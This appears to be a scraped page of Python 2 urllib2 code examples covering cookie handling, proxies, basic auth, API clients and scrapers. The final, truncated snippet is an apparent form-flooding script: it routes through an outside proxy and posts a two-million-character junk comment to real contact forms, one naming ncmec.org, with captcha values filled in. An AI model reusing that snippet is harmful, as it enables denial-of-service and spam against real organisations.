                                                  comment=None,
                                                  comment_url=None,
                                                  rest={'HttpOnly': None},
                                                  rfc2109=False)
                            cookieJar.set_cookie(ck)
                    if 'origin' in m:
                        req.add_header('Origin', m['origin'])
                    if header_in_page:
                        header_in_page = header_in_page.split('&')
                        for h in header_in_page:
                            n, v = h.split('=')
                            req.add_header(n, v)

                    if not cookieJar == None:
                        #                            print 'cookieJarVal',cookieJar
                        cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
                        opener = urllib2.build_opener(
                            cookie_handler, urllib2.HTTPBasicAuthHandler(),
                            urllib2.HTTPHandler())
                        opener = urllib2.install_opener(opener)
                        #                            print 'noredirect','noredirect' in m

                        if 'noredirect' in m:
                            opener = urllib2.build_opener(
                                cookie_handler, NoRedirection,
                                urllib2.HTTPBasicAuthHandler(),
                                urllib2.HTTPHandler())
                            opener = urllib2.install_opener(opener)
                    elif 'noredirect' in m:
                        opener = urllib2.build_opener(
                            NoRedirection, urllib2.HTTPBasicAuthHandler(),
                            urllib2.HTTPHandler())
                        opener = urllib2.install_opener(opener)

                    if 'connection' in m:
                        #                            print '..........................connection//////.',m['connection']
                        from keepalive import HTTPHandler
                        keepalive_handler = HTTPHandler()
                        opener = urllib2.build_opener(keepalive_handler)
                        urllib2.install_opener(opener)

                    #print 'after cookie jar'
                    post = None

                    if 'post' in m:
                        postData = m['post']
                        #if '$LiveStreamRecaptcha' in postData:
                        #    (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
                        #    if captcha_challenge:
                        #        postData=postData.replace('$LiveStreamRecaptcha','manual_recaptcha_challenge_field:'+captcha_challenge+',recaptcha_response_field:'+catpcha_word+',id:'+idfield)
                        splitpost = postData.split(',')
                        post = {}
                        for p in splitpost:
                            n = p.split(':')[0]
                            v = p.split(':')[1]
                            post[n] = v
                        post = urllib.urlencode(post)

                    if 'rawpost' in m:
                        post = m['rawpost']
                        #if '$LiveStreamRecaptcha' in post:
                        #    (captcha_challenge,catpcha_word,idfield)=processRecaptcha(m['page'],cookieJar)
                        #    if captcha_challenge:
                        #       post=post.replace('$LiveStreamRecaptcha','&manual_recaptcha_challenge_field='+captcha_challenge+'&recaptcha_response_field='+catpcha_word+'&id='+idfield)
                    link = ''
                    try:

                        if post:
                            response = urllib2.urlopen(req, post)
                        else:
                            response = urllib2.urlopen(req)
                        if response.info().get('Content-Encoding') == 'gzip':
                            from StringIO import StringIO
                            import gzip
                            buf = StringIO(response.read())
                            f = gzip.GzipFile(fileobj=buf)
                            link = f.read()
                        else:
                            link = response.read()

                        if 'proxy' in m and not current_proxies is None:
                            urllib2.install_opener(
                                urllib2.build_opener(current_proxies))

                        link = javascriptUnEscape(link)
                        #print repr(link)
                        #print link This just print whole webpage in LOG
                        if 'includeheaders' in m:
                            #link+=str(response.headers.get('Set-Cookie'))
                            link += '$$HEADERS_START$$:'
                            for b in response.headers:
                                link += b + ':' + response.headers.get(
                                    b) + '\n'
                            link += '$$HEADERS_END$$:'

#                        print link

                        response.close()
                    except:
                        pass
                    cachedPages[m['page']] = link
                    #print link
                    #print 'store link for',m['page'],forCookieJarOnly

                    if forCookieJarOnly:
                        return cookieJar  # do nothing
                elif m['page'] and not m['page'].startswith('http'):
                    if m['page'].startswith('$pyFunction:'):
                        val = doEval(m['page'].split('$pyFunction:')[1], '',
                                     cookieJar, m)
                        if forCookieJarOnly:
                            return cookieJar  # do nothing
                        link = val
                        link = javascriptUnEscape(link)
                    else:
                        link = m['page']

            if '$doregex' in m['expres']:
                m['expres'] = getRegexParsed(regexs,
                                             m['expres'],
                                             cookieJar,
                                             recursiveCall=True,
                                             cachedPages=cachedPages)

            if not m['expres'] == '':
                #print 'doing it ',m['expres']
                if '$LiveStreamCaptcha' in m['expres']:
                    val = askCaptcha(m, link, cookieJar)
                    #print 'url and val',url,val
                    url = url.replace("$doregex[" + k + "]", val)

                elif m['expres'].startswith(
                        '$pyFunction:') or '#$pyFunction' in m['expres']:
                    #print 'expeeeeeeeeeeeeeeeeeee',m['expres']
                    val = ''
                    if m['expres'].startswith('$pyFunction:'):
                        val = doEval(m['expres'].split('$pyFunction:')[1],
                                     link, cookieJar, m)
                    else:
                        val = doEvalFunction(m['expres'], link, cookieJar, m)
                    if 'ActivateWindow' in m['expres']: return
                    if forCookieJarOnly:
                        return cookieJar  # do nothing
                    if 'listrepeat' in m:
                        listrepeat = m['listrepeat']
                        return listrepeat, eval(val), m, regexs, cookieJar

                    try:
                        url = url.replace(u"$doregex[" + k + "]", val)
                    except:
                        url = url.replace("$doregex[" + k + "]",
                                          val.decode("utf-8"))
                else:
                    if 'listrepeat' in m:
                        listrepeat = m['listrepeat']
                        ret = re.findall(m['expres'], link)
                        return listrepeat, ret, m, regexs

                    val = ''
                    if not link == '':
                        #print 'link',link
                        reg = re.compile(m['expres']).search(link)
                        try:
                            val = reg.group(1).strip()
                        except:
                            traceback.print_exc()
                    elif m['page'] == '' or m['page'] == None:
                        val = m['expres']

                    if rawPost:
                        #                            print 'rawpost'
                        val = urllib.quote_plus(val)
                    if 'htmlunescape' in m:
                        #val=urllib.unquote_plus(val)
                        import HTMLParser
                        val = HTMLParser.HTMLParser().unescape(val)
                    try:
                        url = url.replace("$doregex[" + k + "]", val)
                    except:
                        url = url.replace("$doregex[" + k + "]",
                                          val.decode("utf-8"))
                    #print 'ur',url
                    #return val
            else:
                url = url.replace("$doregex[" + k + "]", '')
    if '$epoctime$' in url:
        url = url.replace('$epoctime$', getEpocTime())
    if '$epoctime2$' in url:
        url = url.replace('$epoctime2$', getEpocTime2())

    if '$GUID$' in url:
        import uuid
        url = url.replace('$GUID$', str(uuid.uuid1()).upper())
    if '$get_cookies$' in url:
        url = url.replace('$get_cookies$', getCookiesString(cookieJar))

    if recursiveCall: return url
    #print 'final url',repr(url)
    if url == "":
        return
    else:
        return url, setresolved
Ejemplo n.º 49
0
 def __init__(self):
     #保存cookie
     self.cj = cookielib.LWPCookieJar()
     cookie_support = urllib2.HTTPCookieProcessor(self.cj)
     opener = urllib2.build_opener(cookie_support, urllib2.HTTPHandler)
     urllib2.install_opener(opener)
Ejemplo n.º 50
0
def open_packet_log():
    httpHandler = urllib2.HTTPHandler(debuglevel=1)
    httpsHandler = urllib2.HTTPSHandler(debuglevel=1)
    opener = urllib2.build_opener(httpHandler, httpsHandler)
    urllib2.install_opener(opener)
    pass
Ejemplo n.º 51
0
def start(args):
    """Login and session handler
    """
    # create cookiejar
    args._cj = LWPCookieJar()

    # lets urllib handle cookies
    opener = build_opener(HTTPCookieProcessor(args._cj))
    opener.addheaders = [("User-Agent",      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"),
                         ("Accept-Encoding", "identity"),
                         ("Accept",          "*/*"),
                         ("Content-Type",    "application/x-www-form-urlencoded")]
    install_opener(opener)

    # load cookies
    try:
        args._cj.load(getCookiePath(args), ignore_discard=True)
    except IOError:
        # cookie file does not exist
        pass

    # get login informations
    username = args._addon.getSetting("crunchyroll_username")
    password = args._addon.getSetting("crunchyroll_password")

    # session management
    if not (args._session_id and args._auth_token):
        # create new session
        payload = {"device_id":    args._device_id,
                   "device_type":  API.DEVICE,
                   "access_token": API.TOKEN}
        req = request(args, "start_session", payload, True)

        # check for error
        if req["error"]:
            return False
        args._session_id = req["data"]["session_id"]

        # make login
        payload = {"password": password,
                   "account":  username}
        req = request(args, "login", payload, True)

        # check for error
        if req["error"]:
            return False
        args._auth_token = req["data"]["auth"]
    if not getattr(args, "_session_restart", False):
        pass
    else:
        # restart session
        payload = {"device_id":    args._device_id,
                   "device_type":  API.DEVICE,
                   "access_token": API.TOKEN,
                   "auth":         args._auth_token}
        req = request(args, "start_session", payload, True)

        # check for error
        if req["error"]:
            destroy(args)
            return False
        args._session_id = req["data"]["session_id"]
        args._auth_token = req["data"]["auth"]
        args._session_restart = False

    return True
Ejemplo n.º 52
0
def fetch_shims():
    """ Download shim files from remote server """
    import urllib2
    attempts = 0
    shims = iter((
        "operaextensions_background.js",
        "operaextensions_popup.js",
        "operaextensions_injectedscript.js",
    ))
    shim_dir = os.path.join(shim_fs_path, shim_dirname)
    shim = next(shims)
    url = shim_fetch_from + shim
    while attempts < 10:
        attempts += 1
        try:
            res = urllib2.urlopen(url)
            if res.code == 200:
                try:
                    if not os.path.exists(shim_dir):
                        os.mkdir(shim_dir)
                    elif os.path.isdir(shim_dir):
                        fh = open(os.path.join(shim_dir, shim), 'w')
                        fh.write(res.read())
                        fh.close()
                except Exception as e:
                    sys.exit("ERROR: Unable to fetch shim files from " + url +
                             "\nException was :" + str(e))
            else:
                if debug:
                    print(('Response:', res.code))
            try:
                shim = next(shims)
            except StopIteration:
                break
            url = shim_fetch_from + shim
        except urllib2.HTTPError as ex:
            if ex.code == 401:
                if debug:
                    print(('HTTP Authentication required:', ex.code, ex.msg,
                           ex.hdrs))
                auth_type = ex.hdrs["WWW-Authenticate"].split()[0]
                realm = ex.hdrs["WWW-Authenticate"].split('=')[1]
                realm = realm.strip('"')
                if auth_type == "Basic":
                    auth_handler = urllib2.HTTPBasicAuthHandler()
                    print("Basic auth: Realm: ", realm)
                    print("Enter username:"******"\n")
                    print("Enter password:"******"\n")
                    auth_handler.add_password(realm=realm,
                                              uri=shim_fetch_from,
                                              user=usr,
                                              passwd=pwd)
                    opener = urllib2.build_opener(auth_handler)
                    urllib2.install_opener(opener)
                    continue
            else:
                print(('Threw :', ex, ' when fetching ', url))
Ejemplo n.º 53
0
def set_proxy():
        proxy = urllib2.ProxyHandler({'http':'wwwcache.open.ac.uk:80', 'https': 'wwwcache.open.ac.uk:80'})
        opener = urllib2.build_opener(proxy)
        urllib2.install_opener(opener)
Ejemplo n.º 54
0
    def send(self, method="GET", path=None, args=None, data=None, auth=False):
        """
            Send a request to the Wrike API

            @param method: the HTTP method
            @param path: the path relative to the repository URL
            @param data: the data to send
            @param auth: this is an authorization request
        """

        repository = self.repository

        # Request URL
        api = "oauth2/token" if auth else "api/v3"
        url = "/".join((repository.url.rstrip("/"), api))
        if path:
            url = "/".join((url, path.lstrip("/")))
        if args:
            url = "?".join((url, urllib.urlencode(args)))

        # Create the request
        req = urllib2.Request(url=url)
        handlers = []

        if not auth:
            # Install access token header
            access_token = self.access_token
            if not access_token:
                message = "Authorization failed: no access token"
                current.log.error(message)
                return None, message
            req.add_header("Authorization", "%s %s" %
                                            (self.token_type, access_token))
            # JSONify request data
            request_data = json.dumps(data) if data else ""
            if request_data:
                req.add_header("Content-Type", "application/json")
        else:
            # URL-encode request data for auth
            request_data = urllib.urlencode(data) if data else ""

        # Indicate that we expect JSON response
        req.add_header("Accept", "application/json")

        # Proxy handling
        config = repository.config
        proxy = repository.proxy or config.proxy or None
        if proxy:
            current.log.debug("using proxy=%s" % proxy)
            proxy_handler = urllib2.ProxyHandler({"https": proxy})
            handlers.append(proxy_handler)

        # Install all handlers
        if handlers:
            opener = urllib2.build_opener(*handlers)
            urllib2.install_opener(opener)

        # Execute the request
        response = None
        message = None
        try:
            if method == "POST":
                f = urllib2.urlopen(req, data=request_data)
            else:
                f = urllib2.urlopen(req)
        except urllib2.HTTPError, e:
            message = "HTTP %s: %s" % (e.code, e.reason)
Ejemplo n.º 55
0
  if options.username:
    usr=options.username
    if options.password:
      pw=options.password
    else:
      try:
        pw=os.environ['ICO_PW']
      except:
        print("Please specify your ICO password")
        pw=raw_input()
    password_manager.add_password(None, options.url, usr, pw)

  auth = urllib2.HTTPBasicAuthHandler(password_manager) # create an authentication handler
  opener = urllib2.build_opener(auth) # create an opener with the authentication handler
  urllib2.install_opener(opener) # install the opener...


  action=options.action.lower()[0]
  ICOType=options.itemtype.lower()[0]

  if ICOType == 'c':
    if action == 'l':
      url="{0}/orchestrator/v2/categories?_limit={1}".format(options.url, options.list_limit)
      request = urllib2.Request(url)
      handler = urllib2.urlopen(request)
      j=json.loads(handler.read())
      if options.debug:
        print(formatted(j))
      cats={}
      for cat in j['items']:
Ejemplo n.º 56
0
def setup_cookie():
    cj = cookielib.CookieJar();
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj));
    urllib2.install_opener(opener);
def main():
    # Connection variables
    csw_url = 'csw.open.canada.ca/geonetwork/srv/csw'
    csw_user = None
    csw_passwd = None

    proxy_protocol = None
    proxy_url = None
    proxy_user = None
    proxy_passwd = None
    records_per_request = 10

    # Or read from a .ini file
    harvester_file = 'config/harvester.ini'
    if os.path.isfile(harvester_file):
        from ConfigParser import ConfigParser

        ini_config = ConfigParser()

        ini_config.read(harvester_file)

        csw_url = ini_config.get('csw', 'url')

        # Get configuration options
        if ini_config.has_option('csw', 'username'):
            csw_user = ini_config.get('csw', 'username')

            csw_passwd = ini_config.get('csw', 'password')

        if ini_config.has_option('proxy', 'protocol'):
            proxy_protocol = ini_config.get('proxy', 'protocol')

        if ini_config.has_option('proxy', 'url'):
            proxy_url = ini_config.get('proxy', 'url')

        if ini_config.has_option('proxy', 'username'):
            proxy_user = ini_config.get('proxy', 'username')
            proxy_passwd = ini_config.get('proxy', 'password')

        if ini_config.has_option('processing', 'records_per_request'):
            records_per_request = int(
                ini_config.get('processing', 'records_per_request'))

        if ini_config.has_option('processing', 'start_date'):
            start_date = ini_config.get('processing', 'start_date')

    # If your supplying a proxy
    if proxy_url:
        # And your using authentication
        if proxy_user and proxy_passwd:
            password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
            password_mgr.add_password(None, proxy_url, proxy_user,
                                      proxy_passwd)
            proxy_auth_handler = urllib2.ProxyBasicAuthHandler(password_mgr)
        # or even if your not
        else:
            proxy_auth_handler = urllib2.ProxyHandler(
                {proxy_protocol: proxy_url})

        opener = urllib2.build_opener(proxy_auth_handler)
        urllib2.install_opener(opener)

    # Fetch the data
    # csw = CatalogueServiceWeb(
    #   'https://*****:*****@csw_url/geonetwork/srv/csw')
    if csw_user and csw_passwd:
        csw = CatalogueServiceWeb('https://' + csw_url,
                                  username=csw_user,
                                  password=csw_passwd,
                                  timeout=20)
    else:
        csw = CatalogueServiceWeb('https://' + csw_url,
                                  timeout=20,
                                  skip_caps=True)

    request_template = """<?xml version="1.0"?>
<csw:GetRecords
    xmlns:csw="http://www.opengis.net/cat/csw/2.0.2"
    service="CSW"
    version="2.0.2"
    resultType="results"
    outputSchema="csw:IsoRecord"
    maxRecords="%d"
    startPosition="%d"
>
    <csw:Query
        typeNames="gmd:MD_Metadata">
        <csw:ElementSetName>full</csw:ElementSetName>
        <csw:Constraint
            version="1.1.0">
            <Filter
                xmlns="http://www.opengis.net/ogc"
                xmlns:gml="http://www.opengis.net/gml">
                <PropertyIsGreaterThanOrEqualTo>
                    <PropertyName>Modified</PropertyName>
                    <Literal>%s</Literal>
                </PropertyIsGreaterThanOrEqualTo>
            </Filter>
        </csw:Constraint>
    </csw:Query>
</csw:GetRecords>
"""

    # Is there a specified start date
    if arguments['-f']:
        start_date = arguments['-f']

    active_page = 0
    next_record = 1
    request_another = True

    while request_another:

        request_another = False

        # Filter records into latest updates
        #
        # Sorry Tom K., we'll be more modern ASAWC.
        # For now it's good ol' Kitchen Sink
        #
        # from owslib.fes import PropertyIsGreaterThanOrEqualTo
        # modified = PropertyIsGreaterThanOrEqualTo(
        #   'apiso:Modified',
        #   '2015-04-04'
        # )
        # csw.getrecords2(constraints=[modified])
        #
        # Kitchen Sink is the valid HNAP, we need HNAP for R1 to debug issues
        # This filter was supplied by EC, the CSW service technical lead
        current_request = request_template % (records_per_request, next_record,
                                              start_date)

        # (active_page*records_per_request)+1
        csw.getrecords2(format='xml', xml=current_request)
        active_page += 1

        # Identify if we need to continue this.
        records_root = ("/csw:GetRecordsResponse")

        # Read the file, should be a streamed input in the future
        root = etree.XML(csw.response)
        # Parse the root and itterate over each record
        records = fetchXMLArray(root, records_root)

        timestamp = fetchXMLAttribute(records[0], "csw:SearchStatus",
                                      "timestamp")[0]
        number_of_records_matched = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "numberOfRecordsMatched")[0])
        number_of_records_returned = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "numberOfRecordsReturned")[0])
        next_record = int(
            fetchXMLAttribute(records[0], "csw:SearchResults",
                              "nextRecord")[0])

        if next_record > number_of_records_matched or next_record == 0:
            pass
        else:
            request_another = True

        # When we move to Tom K's filter we can use results in an R2 unified
        # harvester
        # print csw.results
        # for rec in csw.records:
        #    print '* '+csw.records[rec].title
        # Till then we need to collect and dump the response from the CSW

        # No use minimizing the XML to try to create a XML Lines file as the
        # data has carriage returns.
        # parser = etree.XMLParser(remove_blank_text=True)
        # elem = etree.XML(csw.response, parser=parser)
        # print etree.tostring(elem)

        # Output the harvested page
        print csw.response
Ejemplo n.º 58
0
def install_proxy(proxy):
    print proxy
    opener = urllib2.build_opener(urllib2.ProxyHandler({'http': proxy}),
                                  urllib2.HTTPHandler(debuglevel=1))
    urllib2.install_opener(opener)
    print('Install Proxy Done')
Ejemplo n.º 59
0
def book_spider(book_tag):
    page_num = 0
    book_list = []
    try_times = 0

    while (1):
        url = 'http://www.douban.com/tag' + urllib.quote(
            book_tag) + '/book?start=' + str(page_num * 15)
        time.sleep = (np.random.rand() * 5)

        try:
            random_proxy = random.choice(proxys)
            proxy_support = urllib2.ProxyHandler({"http": random_proxy})
            opener = urllib2.build_opener(proxy_support)
            urllib2.install_opener(opener)
            plain_text = urllib2.urlopen(url)
        except (urllib2.HTTPError, urllib2.URLError), e:
            print e
            continue

        #try:
        #req = urllib2.Request(url,headers = hds[page_num%len(hds)])
        #source_code = urllib2.urlopen(req).read()
        #plain_text = str(source_code)
        #except(urllib2.HTTPError,urllib2.URLError),e:
        #print e
        #continue

        soup = BeautifunSoup(plain_text)
        list_soup = soup.find('div', {'class': 'mod book-list'})

        try_times += 1
        if list_soup == None and try_times < 10:
            continue
        elif list_soup == None and len(list_soup) < 1:
            break

        for book_info in list_soup.findAll('dd'):
            title = book_info.find('a', {'class': 'title'}).string.strip()
            desc = book_info.find('div', {'class': 'desc'}).string.strip()
            desc_list = desc.split('/')
            book_url = book_info.find('a', {'class': 'title'}).get('href')

            try:
                author_info = '作者/译者:' + '/'.join(desc_list[0:-3])
            except:
                author_info = '作者/译者:暂无'

            try:
                pub_info = "出版信息:" + "/".join(desc_list[-3:])
            except:
                pub_info = '出版信息:暂无'

            try:
                rating = book_info.find('span', {
                    'class': 'rating_num'
                }).string.strip()
            except:
                rating = '0.0'

            try:
                people_num = get_people_num(book_url)
                people_num = people_num.strip('人物评价')
            except:
                people_num = '0'

            book_list.append(
                [title, rating, people_num, author_info, pub_info])
            try_times = 0
        page_num += 1
        print 'Downloading Information From Page %d' % page_num
Ejemplo n.º 60
0
"submitted[email_address]" : "*****@*****.**",
"submitted[phone_number]" : "*****@*****.**",
"submitted[comment]" : big,
"details[sid]" : '',
"details[page_num]" : 1,
"details[page_count]" : 1,
"details[finished]" :  0,
"form_build_id" : "form-Wh5QUVUNov9DMh-a57x0lfeB5mKYJeuiAYDZrlO1yh4",
"form_id" : "webform_client_form_1",
"captcha_sid": 421933,
"captcha_token" : "cd93ba2b98de546c744526b83fd8b3e5",
"captcha_response" : "Zh9CR",
"op" : "Send"

'''
'''proxy = urllib2.ProxyHandler({'http': '119.148.9.130:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)

lis 	= list(ascii_lowercase)
big 	= ''.join(choice(lis) for _ in xrange(2000000)) 
data = urllib.urlencode({
		"LanguageId":"en_US",
		"_01_name":"hgfh",
		"_02_email":"*****@*****.**",
		"_03_comments": big,
		"action":"sendEmailReport",
		"cc":"",
		"fromDomain":"ncmec.org",
		"fromName":"servlet",
		"mailtoDomain":"ncmec.org",